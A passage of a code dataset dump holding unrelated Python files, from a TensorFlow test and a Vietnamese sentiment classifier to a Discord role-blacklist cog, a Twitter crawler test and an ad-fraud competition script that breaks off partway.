agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for dirichlet.\"\"\"\n\nimport collections\nimport itertools\n\nfrom absl.testing import parameterized\nimport tensorflow as tf\n\nfrom generalization.synthesization import dirichlet\n\n\nclass DirichletTest(tf.test.TestCase, parameterized.TestCase):\n\n @parameterized.named_parameters(\n (f'num_clients={num_clients}, rotate={rotate}', num_clients, rotate)\n for num_clients, rotate in itertools.product([1, 2, 3], [True, False]))\n def test_synthesize_by_dirichlet_over_labels(self, num_clients, rotate):\n test_dataset = tf.data.Dataset.from_tensor_slices(\n collections.OrderedDict(\n x=list(range(9)), foo=['a', 'b', 'c'] * 3, label=[0, 1, 6] * 3))\n cd = dirichlet.synthesize_by_dirichlet_over_labels(\n dataset=test_dataset, num_clients=num_clients, use_rotate_draw=rotate)\n\n self.assertCountEqual(cd.client_ids, map(str, range(num_clients)))\n\n expected_num_elements_per_client = (9 // num_clients)\n\n for client_id in cd.client_ids:\n local_ds = cd.create_tf_dataset_for_client(client_id)\n self.assertLen(list(local_ds), expected_num_elements_per_client)\n\n\nif __name__ == '__main__':\n tf.test.main()\n","sub_path":"generalization/synthesization/dirichlet_test.py","file_name":"dirichlet_test.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"481449517","text":"\nimport sounddevice as sd\nfrom scipy.io.wavfile import write\n\ndef record_audio(correct_length):\n print(\"Start speaking...\")\n fs = 44100 # Sample rate\n seconds = correct_length*2.5 # Duration of recording\n myrecording = sd.rec(int(seconds * fs), samplerate=fs, channels=2)\n sd.wait() # Wait until recording is finished\n write('input_sound.wav', fs, myrecording) # Save as WAV file","sub_path":"Azure/record_audio.py","file_name":"record_audio.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"653974487","text":"from matplotlib.transforms import BboxTransformTo\nfrom matplotlib.transforms import Bbox\nfrom limix_util.dict import traverse_dict\nfrom math import sqrt\n\ndef _grid_trans(nrow, ncol, i):\n r = int(i / ncol)\n c = int(i % ncol)\n h = 1. / nrow\n w = 1. / ncol\n y0 = 1 - (r+1) * h\n x0 = c * w\n box = Bbox.from_bounds(x0, y0, w, h)\n return BboxTransformTo(box)\n\nclass _GridPlot(object):\n def __init__(self, visit_func, fig):\n self._fig = fig\n\n self._min_box_width = float('inf')\n self._min_box_height = float('inf')\n self._visit_func = visit_func\n\n h = 0.1 * 2/4.\n self._title_trans = BboxTransformTo(Bbox.from_bounds(0, 1-h, 1, h))\n self._body_trans = BboxTransformTo(Bbox.from_bounds(0, 0, 1, 1-h))\n self._axes_trans = BboxTransformTo(Bbox.from_bounds(0.1, 0.15, 0.8, 0.75))\n\n # self._color_cycle = cycle(color_palette(\"husl\", 8))\n\n def traverse(self, group_names, data):\n trans = BboxTransformTo(Bbox.from_bounds(0.015, 0.005, 1-0.03, 1-0.005))\n opts = dict(names=group_names, trans=trans)\n traverse_dict(data, self._callback, opts)\n\n def adjust_figsize(self):\n # default_fig_size\n dfs = (8., 6.)\n # default_axis_size\n das = (0.77500000000000002, 0.80000000000000004)\n\n width = dfs[0] * das[0] / self._min_box_width\n height = dfs[1] * das[1] / self._min_box_height\n self._fig.set_size_inches(width, height)\n\n\n def _callback(self, d, opt):\n n = len(d)\n # plot_this = n > 0 and\\\n # (not isinstance(d, dict) or len(opt['names']) == 0)\n # import ipdb; ipdb.set_trace()\n if opt is None:\n return\n plot_this = n > 0 and len(opt['names']) == 0\n\n if plot_this:\n trans = self._axes_trans + opt['trans']\n (x0, y0) = trans.transform([0, 0])\n (x1, y1) = trans.transform([1, 1])\n axes = self._fig.add_axes([x0, y0, x1-x0, y1-y0])\n\n self._visit_func(d, axes)\n\n box = axes.get_position()\n self._min_box_width = min(box.width, self._min_box_width)\n self._min_box_height = min(box.height, self._min_box_height)\n else:\n (x, y) = (self._title_trans + opt['trans']).transform((0.5, 0.5))\n\n # color = next(self._color_cycle)\n self._fig.text(x, y, opt['names'][0], horizontalalignment='center',\n verticalalignment='center')\n\n\n nrow = ncol = int(sqrt(n))\n if nrow * ncol < n:\n ncol += 1\n if nrow * ncol < n:\n nrow += 1\n\n opts = []\n\n for i in range(len(d)):\n grid_trans = _grid_trans(nrow, ncol, i)\n cell_trans = (grid_trans + self._body_trans + opt['trans'])\n (x, y) = (self._title_trans + cell_trans).transform((0.5, 1.))\n\n self._fig.text(x, y, d.keys()[i], horizontalalignment='center',\n verticalalignment='center')\n\n nopt = dict(names=opt['names'][1:],\n trans=self._body_trans+cell_trans)\n opts.append(nopt)\n\n return opts\n\ndef grid_plot(group_names, data, visit_func, fig):\n gp = _GridPlot(visit_func, fig=fig)\n gp.traverse(group_names, data)\n gp.adjust_figsize()\n","sub_path":"limix_plot/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"56154361","text":"# This file is part of the Adblock Plus web scripts,\n# Copyright (C) 2006-present eyeo GmbH\n#\n# Adblock Plus is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 3 as\n# published by the Free Software Foundation.\n#\n# Adblock Plus is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Adblock Plus. If not, see .\n\nimport pytest\n\nfrom sitescripts.utils import get_template\n\n\ndef test_get_template_default_path():\n \"\"\"Load template from inside sitescripts.\"\"\"\n template = get_template('__init__.py')\n assert template.render({}).startswith('# This file')\n\n\n@pytest.mark.parametrize('mode', ['relative', 'absolute'])\ndef test_get_template(tmpdir, mode):\n \"\"\"Load template using relative or absolute path.\"\"\"\n template_path = tmpdir.join('template.tmpl')\n template_path.write('value = {{ value }}')\n\n if mode == 'absolute':\n template = get_template(template_path.strpath)\n else:\n template = get_template('template.tmpl', template_path=tmpdir.strpath)\n\n assert template.render({'value': 1}) == 'value = 1'\n","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"159558575","text":"from sklearn.linear_model import LogisticRegression\r\nfrom sklearn.metrics import classification_report\r\nimport numpy as np\r\nimport regex as re\r\nfrom pyvi import ViTokenizer\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import LabelEncoder\r\nimport os\r\nimport pickle\r\nimport time\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.feature_extraction.text import TfidfTransformer\r\n\r\nuniChars = \"àáảãạâầấẩẫậăằắẳẵặèéẻẽẹêềếểễệđìíỉĩịòóỏõọôồốổỗộơờớởỡợùúủũụưừứửữựỳýỷỹỵÀÁẢÃẠÂẦẤẨẪẬĂẰẮẲẴẶÈÉẺẼẸÊỀẾỂỄỆĐÌÍỈĨỊÒÓỎÕỌÔỒỐỔỖỘƠỜỚỞỠỢÙÚỦŨỤƯỪỨỬỮỰỲÝỶỸỴÂĂĐÔƠƯ\"\r\nunsignChars = \"aaaaaaaaaaaaaaaaaeeeeeeeeeeediiiiiooooooooooooooooouuuuuuuuuuuyyyyyAAAAAAAAAAAAAAAAAEEEEEEEEEEEDIIIOOOOOOOOOOOOOOOOOOOUUUUUUUUUUUYYYYYAADOOU\"\r\n\r\n\r\ndef loaddicchar():\r\n dic = {}\r\n char1252 = 'à|á|ả|ã|ạ|ầ|ấ|ẩ|ẫ|ậ|ằ|ắ|ẳ|ẵ|ặ|è|e��|ẻ|ẽ|ẹ|ề|ế|ể|ễ|ệ|ì|í|ỉ|ĩ|ị|ò|ó|ỏ|õ|ọ|ồ|ố|ổ|ỗ|ộ|ờ|ớ|ở|ỡ|ợ|ù|ú|ủ|ũ|ụ|ừ|ứ|ử|ữ|ự|ỳ|ý|ỷ|ỹ|ỵ|À|Á|Ả|Ã|Ạ|Ầ|Ấ|Ẩ|Ẫ|Ậ|Ằ|Ắ|Ẳ|Ẵ|Ặ|È|É|Ẻ|Ẽ|Ẹ|Ề|Ế|Ể|Ễ|Ệ|Ì|Í|Ỉ|Ĩ|Ị|Ò|Ó|Ỏ|Õ|Ọ|Ồ|Ố|Ổ|Ỗ|Ộ|Ờ|Ớ|Ở|Ỡ|Ợ|Ù|Ú|Ủ|Ũ|Ụ|Ừ|Ứ|Ử|Ữ|Ự|Ỳ|Ý|Ỷ|Ỹ|Ỵ'.split(\r\n '|')\r\n charutf8 = \"à|á|ả|ã|ạ|ầ|ấ|ẩ|ẫ|ậ|ằ|ắ|ẳ|ẵ|ặ|è|é|ẻ|ẽ|ẹ|ề|ế|ể|ễ|ệ|ì|í|ỉ|ĩ|ị|ò|ó|ỏ|õ|ọ|ồ|ố|ổ|ỗ|ộ|ờ|ớ|ở|ỡ|ợ|ù|ú|ủ|ũ|ụ|ừ|ứ|ử|ữ|ự|ỳ|ý|ỷ|ỹ|ỵ|À|Á|Ả|Ã|Ạ|Ầ|Ấ|Ẩ|Ẫ|Ậ|Ằ|Ắ|Ẳ|Ẵ|Ặ|È|É|Ẻ|Ẽ|Ẹ|Ề|Ế|Ể|Ễ|Ệ|Ì|Í|Ỉ|Ĩ|Ị|Ò|Ó|Ỏ|Õ|Ọ|Ồ|Ố|Ổ|Ỗ|Ộ|Ờ|Ớ|Ở|Ỡ|Ợ|Ù|Ú|Ủ|Ũ|Ụ|Ừ|Ứ|Ử|Ữ|Ự|Ỳ|Ý|Ỷ|Ỹ|Ỵ\".split(\r\n '|')\r\n for i in range(len(char1252)):\r\n dic[char1252[i]] = charutf8[i]\r\n return dic\r\n\r\n\r\ndicchar = loaddicchar()\r\n\r\n# Hàm chuyển Unicode dựng sẵn về Unicde tổ hợp (phổ biến hơn)\r\ndef convert_unicode(txt):\r\n return re.sub(\r\n r'à|á|ả|ã|ạ|ầ|ấ|ẩ|ẫ|ậ|ằ|ắ|ẳ|ẵ|ặ|è|é|ẻ|ẽ|ẹ|ề|ế|ể|ễ|ệ|ì|í|ỉ|ĩ|ị|ò|ó|ỏ|õ|ọ|ồ|ố|ổ|ỗ|ộ|ờ|ớ|ở|ỡ|ợ|ù|ú|ủ|ũ|ụ|ừ|ứ|ử|ữ|ự|ỳ|ý|ỷ|ỹ|ỵ|À|Á|Ả|Ã|Ạ|Ầ|Ấ|Ẩ|Ẫ|Ậ|Ằ|Ắ|Ẳ|Ẵ|Ặ|È|É|Ẻ|Ẽ|Ẹ|Ề|Ế|Ể|Ễ|Ệ|Ì|Í|Ỉ|Ĩ|Ị|Ò|Ó|Ỏ|Õ|Ọ|Ồ|Ố|Ổ|Ỗ|Ộ|Ờ|Ớ|Ở|Ỡ|Ợ|Ù|Ú|Ủ|Ũ|Ụ|Ừ|Ứ|Ử|Ữ|Ự|Ỳ|Ý|Ỷ|Ỹ|Ỵ',\r\n lambda x: dicchar[x.group()], txt)\r\n\r\n\r\nbang_nguyen_am = [['a', 'à', 'á', 'ả', 'ã', 'ạ', 'a'],\r\n ['ă', 'ằ', 'ắ', 'ẳ', 'ẵ', 'ặ', 'aw'],\r\n ['â', 'ầ', 'ấ', 'ẩ', 'ẫ', 'ậ', 'aa'],\r\n ['e', 'è', 'é', 'ẻ', 'ẽ', 'ẹ', 'e'],\r\n ['ê', 'ề', 'ế', 'ể', 'ễ', 'ệ', 'ee'],\r\n ['i', 'ì', 'í', 'ỉ', 'ĩ', 'ị', 'i'],\r\n ['o', 'ò', 'ó', 'ỏ', 'õ', 'ọ', 'o'],\r\n ['ô', 'ồ', 'ố', 'ổ', 'ỗ', 'ộ', 'oo'],\r\n ['ơ', 'ờ', 'ớ', 'ở', 'ỡ', 'ợ', 'ow'],\r\n ['u', 'ù', 'ú', 'ủ', 'ũ', 'ụ', 'u'],\r\n ['ư', 'ừ', 'ứ', 'ử', 'ữ', 'ự', 'uw'],\r\n ['y', 'ỳ', 'ý', 'ỷ', 'ỹ', 'ỵ', 'y']]\r\nbang_ky_tu_dau = ['', 'f', 's', 'r', 'x', 'j']\r\n\r\nnguyen_am_to_ids = {}\r\n\r\nfor i in range(len(bang_nguyen_am)):\r\n for j in range(len(bang_nguyen_am[i]) - 1):\r\n nguyen_am_to_ids[bang_nguyen_am[i][j]] = (i, j)\r\n\r\n\r\ndef chuan_hoa_dau_tu_tieng_viet(word):\r\n if not is_valid_vietnam_word(word):\r\n return word\r\n\r\n chars = list(word)\r\n dau_cau = 0\r\n nguyen_am_index = []\r\n qu_or_gi = False\r\n for index, char in enumerate(chars):\r\n x, y = nguyen_am_to_ids.get(char, (-1, -1))\r\n if x == -1:\r\n continue\r\n elif x == 9: # check qu\r\n if index != 0 and chars[index - 1] == 'q':\r\n chars[index] = 'u'\r\n qu_or_gi = True\r\n elif x == 5: # check gi\r\n if index != 0 and chars[index - 1] == 'g':\r\n chars[index] = 'i'\r\n qu_or_gi = True\r\n if y != 0:\r\n dau_cau = y\r\n chars[index] = bang_nguyen_am[x][0]\r\n if not qu_or_gi or index != 1:\r\n nguyen_am_index.append(index)\r\n if len(nguyen_am_index) < 2:\r\n if qu_or_gi:\r\n if len(chars) == 2:\r\n x, y = nguyen_am_to_ids.get(chars[1])\r\n chars[1] = bang_nguyen_am[x][dau_cau]\r\n else:\r\n x, y = nguyen_am_to_ids.get(chars[2], (-1, -1))\r\n if x != -1:\r\n chars[2] = bang_nguyen_am[x][dau_cau]\r\n else:\r\n chars[1] = bang_nguyen_am[5][dau_cau] if chars[1] == 'i' else bang_nguyen_am[9][dau_cau]\r\n return ''.join(chars)\r\n return word\r\n\r\n for index in nguyen_am_index:\r\n x, y = nguyen_am_to_ids[chars[index]]\r\n if x == 4 or x == 8: # ê, ơ\r\n chars[index] = bang_nguyen_am[x][dau_cau]\r\n return ''.join(chars)\r\n\r\n if len(nguyen_am_index) == 2:\r\n if nguyen_am_index[-1] == len(chars) - 1:\r\n x, y = nguyen_am_to_ids[chars[nguyen_am_index[0]]]\r\n chars[nguyen_am_index[0]] = bang_nguyen_am[x][dau_cau]\r\n else:\r\n x, y = nguyen_am_to_ids[chars[nguyen_am_index[1]]]\r\n chars[nguyen_am_index[1]] = bang_nguyen_am[x][dau_cau]\r\n else:\r\n x, y = nguyen_am_to_ids[chars[nguyen_am_index[1]]]\r\n chars[nguyen_am_index[1]] = bang_nguyen_am[x][dau_cau]\r\n return ''.join(chars)\r\n\r\n\r\ndef is_valid_vietnam_word(word):\r\n chars = list(word)\r\n nguyen_am_index = -1\r\n for index, char in enumerate(chars):\r\n x, y = nguyen_am_to_ids.get(char, (-1, -1))\r\n if x != -1:\r\n if nguyen_am_index == -1:\r\n nguyen_am_index = index\r\n else:\r\n if index - nguyen_am_index != 1:\r\n return False\r\n nguyen_am_index = index\r\n return True\r\n\r\n\r\ndef chuan_hoa_dau_cau_tieng_viet(sentence):\r\n \"\"\"\r\n Chuyển câu tiếng Việt về chuẩn gõ dấu kiểu cũ.\r\n :param sentence:\r\n :return:\r\n \"\"\"\r\n sentence = sentence.lower()\r\n words = sentence.split()\r\n for index, word in enumerate(words):\r\n cw = re.sub(r'(^\\p{P}*)([p{L}.]*\\p{L}+)(\\p{P}*$)',\r\n r'\\1/\\2/\\3', word).split('/')\r\n if len(cw) == 3:\r\n cw[1] = chuan_hoa_dau_tu_tieng_viet(cw[1])\r\n words[index] = ''.join(cw)\r\n return ' '.join(words)\r\n\r\n\r\ndef remove_html(txt):\r\n return re.sub(r'<[^>]*>', '', txt)\r\n\r\n\r\ndef text_preprocess(document):\r\n # xóa html code\r\n document = remove_html(document)\r\n # chuẩn hóa unicode\r\n document = convert_unicode(document)\r\n # chuẩn hóa cách gõ dấu tiếng Việt\r\n document = chuan_hoa_dau_cau_tieng_viet(document)\r\n # tách từ\r\n document = ViTokenizer.tokenize(document)\r\n # đưa về lower\r\n document = document.lower()\r\n # xóa các ký tự không cần thiết\r\n document = re.sub(\r\n r'[^\\s\\wáàảãạăắằẳẵặâấầẩẫậéèẻẽẹêếềểễệóòỏõọôốồổỗộơớờởỡợíìỉĩịúùủũụưứừửữựýỳỷỹỵđ_]', ' ', document)\r\n # xóa khoảng trắng thừa\r\n document = re.sub(r'\\s+', ' ', document).strip()\r\n return document\r\n\r\n\r\n# Thống kê số lượng data theo nhãn\r\ncount = {}\r\nfor line in open('sentiment_analysis_train.txt', 'r', encoding='utf-8'):\r\n key = line.split()[0]\r\n count[key] = count.get(key, 0) + 1\r\n\r\nfor key in count:\r\n print(key, count[key])\r\n\r\n# Thống kê các word xuất hiện ở tất cả các nhãn\r\ntotal_label = 5\r\nvocab = {}\r\nlabel_vocab = {}\r\nfor line in open('sentiment_analysis_train.txt', 'r', encoding='utf-8'):\r\n words = line.split()\r\n # lưu ý từ đầu tiên là nhãn\r\n label = words[0]\r\n if label not in label_vocab:\r\n label_vocab[label] = {}\r\n for word in words[1:]:\r\n label_vocab[label][word] = label_vocab[label].get(word, 0) + 1\r\n if word not in vocab:\r\n vocab[word] = set()\r\n vocab[word].add(label)\r\n\r\ncount = {}\r\nfor word in vocab:\r\n if len(vocab[word]) == total_label:\r\n count[word] = min([label_vocab[x][word] for x in label_vocab])\r\n print\r\n\r\nsorted_count = sorted(count, key=count.get, reverse=True)\r\nfor word in sorted_count[:100]:\r\n print(word, count[word])\r\n\r\n# loại stopword khỏi dữ liệu\r\nstopword = set()\r\nwith open('stopwords.txt', 'w', encoding=\"utf-8\") as fp:\r\n for word in sorted_count[:100]:\r\n stopword.add(word)\r\n fp.write(word + '\\n')\r\n\r\n\r\ndef remove_stopwords(line):\r\n words = []\r\n for word in line.strip().split():\r\n if word not in stopword:\r\n words.append(word)\r\n return ' '.join(words)\r\n\r\n\r\nwith open('sentiment_analysis.prep', 'w', encoding=\"utf-8\") as fp:\r\n for line in open('sentiment_analysis_train.txt', encoding=\"utf-8\"):\r\n line = remove_stopwords(line)\r\n fp.write(line + '\\n',)\r\n\r\n\r\n# Chia tập train/test\r\ntest_percent = 0.2\r\n\r\ntext = []\r\nlabel = []\r\n\r\nfor line in open('sentiment_analysis.prep', encoding=\"utf-8\"):\r\n words = line.strip().split()\r\n label.append(words[0])\r\n text.append(' '.join(words[1:]))\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(\r\n text, label, test_size=test_percent, random_state=42)\r\n\r\n# Lưu train/test data\r\n# Giữ nguyên train/test để về sau so sánh các mô hình cho công bằng\r\nwith open('train.txt', 'w', encoding=\"utf-8\") as fp:\r\n for x, y in zip(X_train, y_train):\r\n fp.write('{} {}\\n'.format(y, x))\r\n\r\nwith open('test.txt', 'w', encoding=\"utf-8\") as fp:\r\n for x, y in zip(X_test, y_test):\r\n fp.write('{} {}\\n'.format(y, x))\r\n\r\n# encode label\r\nlabel_encoder = LabelEncoder()\r\nlabel_encoder.fit(y_train)\r\nprint(list(label_encoder.classes_), '\\n')\r\ny_train = label_encoder.transform(y_train)\r\ny_test = label_encoder.transform(y_test)\r\n\r\nprint(X_train[0], y_train[0], '\\n')\r\nprint(X_test[0], y_test[0])\r\n\r\nMODEL_PATH = \"models\"\r\nif not os.path.exists(MODEL_PATH):\r\n os.makedirs(MODEL_PATH)\r\n\r\n\r\n# Linear Classifier\r\n\r\nstart_time = time.time()\r\ntext_clf = Pipeline([('vect', CountVectorizer(ngram_range=(1, 1),\r\n max_df=0.8,\r\n max_features=None)),\r\n ('tfidf', TfidfTransformer()),\r\n ('clf', LogisticRegression(solver='lbfgs',\r\n multi_class='auto',\r\n max_iter=10000))\r\n ])\r\ntext_clf = text_clf.fit(X_train, y_train)\r\n\r\ntrain_time = time.time() - start_time\r\nprint('Done training Linear Classifier in', train_time, 'seconds.')\r\n\r\npickle.dump(text_clf, open(os.path.join(\r\n MODEL_PATH, \"linear_classifier.pkl\"), 'wb'))\r\n\r\n\r\n# Đánh giá mô hình\r\n# Linear Classifier\r\nmodel = pickle.load(\r\n open(os.path.join(MODEL_PATH, \"linear_classifier.pkl\"), 'rb'))\r\ny_pred = model.predict(X_test)\r\nprint('Linear Classifier, Accuracy =', np.mean(y_pred == y_test))\r\n\r\n# Xem kết quả trên từng nhãn\r\nln_model = pickle.load(\r\n open(os.path.join(MODEL_PATH, \"linear_classifier.pkl\"), 'rb'))\r\ny_pred = ln_model.predict(X_test)\r\nprint(classification_report(y_test, y_pred,\r\n target_names=list(label_encoder.classes_)))\r\n\r\n\r\nfor line in open('sentiment_analysis_test.txt', 'r', encoding='utf-8'):\r\n document = line\r\n document = text_preprocess(document)\r\n document = remove_stopwords(document)\r\n label = ln_model.predict([document])\r\n f = open(\"sentiment_analysis_result.txt\", \"a\", encoding=\"utf-8\")\r\n words = label_encoder.inverse_transform(label)[0], line\r\n words = \" \".join(words)\r\n f.write(words)\r\n","sub_path":"sentiment_analysis.py","file_name":"sentiment_analysis.py","file_ext":"py","file_size_in_byte":12467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"129545405","text":"import discord\nimport os\nimport pickle\nfrom discord.ext import commands\nfrom discord.utils import get\n\nif os.path.isfile(\"files/blacklist.dat\"):\n try:\n with open(\"files/blacklist.dat\", \"rb\") as blacklist:\n blacklisted = pickle.load(blacklist)\n\n except EOFError:\n blacklisted = []\n\nelse:\n print(\"blacklist.dat is either deleted or corrupted! Please check and try again.\")\n\nclass serverCog(commands.Cog):\n def __init__(self, client):\n self.client = client\n\n @commands.command()\n @commands.has_any_role(\"Admins\", \"Moderators\")\n async def blacklist(self, nes, user_id: str):\n if len(user_id) > 16 or len(user_id) < 22 and user_id.isdigit():\n if user_id in blacklisted:\n await nes.send(f\"User already exists!\")\n\n else:\n blacklisted.append(user_id)\n await nes.send(f\"User blacklisted.\")\n\n else:\n await nes.send(f\"Invalid User ID! Please try again.\")\n\n @commands.command()\n @commands.has_any_role(\"Admins\", \"Moderators\")\n async def listblacklist(self, nes):\n listBlacklist = str(blacklisted)[1:-1]\n\n if not blacklisted:\n \tawait nes.send(f\"No one is blacklisted.\")\n\n else:\n await nes.send(\"List of User IDs blacklisted - `{}`\" .format(listBlacklist))\n\n @commands.command()\n @commands.has_any_role(\"Admins\", \"Moderators\")\n async def unblacklist(self, nes, type_: str, user_id: str):\n if len(user_id) == 18 and user_id.isdigit():\n if user_id in blacklisted:\n blacklisted.remove(user_id)\n await nes.send(f\"User unblacklisted.\")\n\n else:\n await nes.send(f\"User doesn't exist! Please try again.\")\n\n else:\n await nes.send(f\"Invalid User ID! Please try again.\")\n\n @commands.command()\n async def pol(self, nes):\n author = nes.message.author\n id = str(nes.message.author.id)\n role = get(author.guild.roles, name = \"Politics\")\n\n if id in blacklisted:\n await nes.send(f\"Sorry, you have been blacklisted.\")\n return\n\n elif role in author.roles:\n await nes.send(f\"You already have the role!\")\n\n else:\n await author.add_roles(role)\n await nes.send(f\"Role assigned to you.\")\n\n @commands.command()\n async def unpol(self, nes):\n author = nes.message.author\n id = str(nes.message.author.id)\n role = get(author.guild.roles, name = \"Politics\")\n\n if id in blacklisted:\n await nes.send(f\"Sorry, you have been blacklisted.\")\n return\n\n elif not role in author.roles:\n await nes.send(f\"You already don't have the role!\")\n\n else:\n await author.remove_roles(role)\n await nes.send(f\"Role removed from you.\")\n\ndef setup(client):\n client.add_cog(serverCog(client))","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"414799506","text":"import math\r\n\r\ndef whoIsNext(names, r):\r\n n = len(names)\r\n k = 2 ** int(math.log(1 + (r - 1) // n, 2))\r\n s = 1 + (k - 1) * n\r\n return names[(r - s) // k]\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nnames = [\"Sheldon\", \"Leonard\", \"Penny\", \"Rajesh\", \"Howard\"]\r\nr = 20\r\n\r\nprint(whoIsNext(names, 7230702951))\r\n","sub_path":"learn17.py","file_name":"learn17.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"421914376","text":"from mini_crawler import MiniCrawler\nimport os\nimport json\n\nCONFIG_PATH=\"../../config/twitter_config.json\"\nOUTPUT_FOLDER = \"test_data\"\nTERMS = [\"covid\", \"coronavirus\", \"covid-19\", \"#covid-19\", \"#coronavirus\"]\n\ndef test_constructor():\n crawler = MiniCrawler(config_path=CONFIG_PATH, output_folder=OUTPUT_FOLDER)\n print(crawler.output_folder)\n\ndef test_config():\n config_path = CONFIG_PATH\n config = None\n with open(os.path.abspath(config_path), 'r') as config_f:\n config = json.load(config_f)\n apikeys = list(config['apikeys'].values()).pop()\n print(apikeys)\n\ndef test_crawler():\n crawler = MiniCrawler(config_path=CONFIG_PATH, output_folder=OUTPUT_FOLDER)\n result = crawler.search_by_terms(TERMS, 10, output_to_file=True)\n #print(result)\n n = 1\n for tweet in result:\n print(\"Tweet {}:\".format(n))\n print(tweet[\"text\"])\n print(\"\\n\")\n n += 1\n\ntest_constructor()\ntest_config()\n\n#commented just in case, uncomment to test\n#test_crawler()\n\n","sub_path":"service_composition/mini_crawler/test_crawler.py","file_name":"test_crawler.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"607521174","text":"import os\nimport sys\nimport string\nimport time\nimport random\nimport datetime\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.metrics import f1_score\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom scipy import sparse\nimport lightgbm as lgb\n\n#current_path = os.path.split(os.path.realpath(__file__))[0]\ncurrent_path = os.path.split(os.path.realpath(__file__))[0]\n# current_path = './atad/'\n# current_path = 'F:/github_me_repos/data_competition/kdxf2019_mobileAD/'\nos.chdir(current_path)\n\ndef generate_muffle_files(file_num=100):\n start_t = time.time()\n\n def file_number_under_path(dirname):\n result = [] # 所有的文件\n for maindir, subdir, file_name_list in os.walk(dirname):\n for filename in file_name_list:\n file_path = os.path.join(maindir, filename) # 合并成一个完整路径\n result.append(file_path)\n return len(result)\n\n def gen_content(line_num=25):\n candidate_chs = string.digits + string.ascii_letters\n content = ''\n for i in range(line_num):\n content += ''.join(random.choices(candidate_chs, k=120)) + '\\n'\n # print('content is ', content)\n return content\n\n def gen_rand_file(file_name_len=16):\n all_candidate_chs = string.digits + string.ascii_letters\n upper_letters = ''.join(set(string.ascii_uppercase) - set('AGMS'))\n print('upper_letters is ', upper_letters)\n print(all_candidate_chs)\n file_name = ''\n for i in range(file_name_len):\n if i<=2:\n file_name += random.choice(upper_letters)\n else:\n file_name += random.choice(all_candidate_chs)\n print('file_name is ', file_name)\n with open(current_path + '/temp_data/' + file_name + '.txt', 'w') as file:\n file.write(gen_content())\n return file_name\n\n # print('file_number is ', file_number_under_path(current_path + '/temp_data/'))\n\n for i in range(file_num):\n gen_rand_file()\n print('generate_muffle_files cost time ', time.time()-start_t)\n\ngenerate_muffle_files()\n\nsys.exit(0)\n\ndf_train = pd.read_csv(current_path + '/data/round1_iflyad_anticheat_traindata.txt', sep='\\t')\nprint('df_train.shape is ', df_train.shape, df_train.head(10), list(df_train.columns)) # (1000000, 29)\n\ndf_test = pd.read_csv(current_path + '/data/round1_iflyad_anticheat_testdata_feature.txt', sep='\\t')\nprint('df_test.shape is ', df_test.shape, df_test.head(10), list(df_test.columns))\n\ndf_merged = pd.concat([df_train, df_test])\ndf_merged = df_merged.sample(250000)\n\ndf_merged = df_merged.fillna(-1)\n\n# df_merged['year'] = df_merged['nginxtime'].apply(lambda x: int(time.strftime(\"%Y\", time.localtime(x//1000))))\n# df_merged['month'] = df_merged['nginxtime'].apply(lambda x: int(time.strftime(\"%m\", time.localtime(x//1000))))\n# df_merged['day'] = df_merged['nginxtime'].apply(lambda x: int(time.strftime(\"%d\", time.localtime(x//1000))))\ndf_merged['hour'] = df_merged['nginxtime'].apply(lambda x: int(time.strftime(\"%H\", time.localtime(x//1000))))\ndf_merged['minute'] = df_merged['nginxtime'].apply(lambda x: int(time.strftime(\"%M\", time.localtime(x//1000))))\n\ndel df_merged['nginxtime']\n\n# media_cate_feature = ['pkgname', 'ver', 'adunitshowid', 'mediashowid', 'apptype']\nmedia_cate_feature = ['ver', 'apptype']\n# ip_cate_feature = ['reqrealip', 'city', 'province']\nip_cate_feature = ['city', 'province']\n# device_cate_feature = ['carrier', 'os', 'osv', 'ntt', 'model', 'make', 'ppi']\ndevice_cate_feature = []\norigin_cate_list = media_cate_feature + ip_cate_feature + device_cate_feature\n\nprint('get here 111')\n\n# 编码,加速\nfor i in origin_cate_list:\n df_merged[i] = df_merged[i].map(dict(zip(df_merged[i].unique(), range(0, df_merged[i].nunique()))))\n\nprint('df_merged.shape is ', df_merged.shape, df_merged.columns)\n\ncount_feature_list = []\n\n# print('df_merged[\"label\"] ', df_merged[['year', 'month', 'day', 'hour', 'minute', 'nginxtime']])\n\ndef feature_count(data, features=[], is_feature=True):\n print('in feature_count()')\n if len(set(features)) != len(features):\n print('equal feature !!!!')\n return data\n new_feature = 'count'\n nunique = []\n for i in features:\n nunique.append(data[i].nunique())\n new_feature += '_' + i.replace('add_', '')\n if len(features) > 1 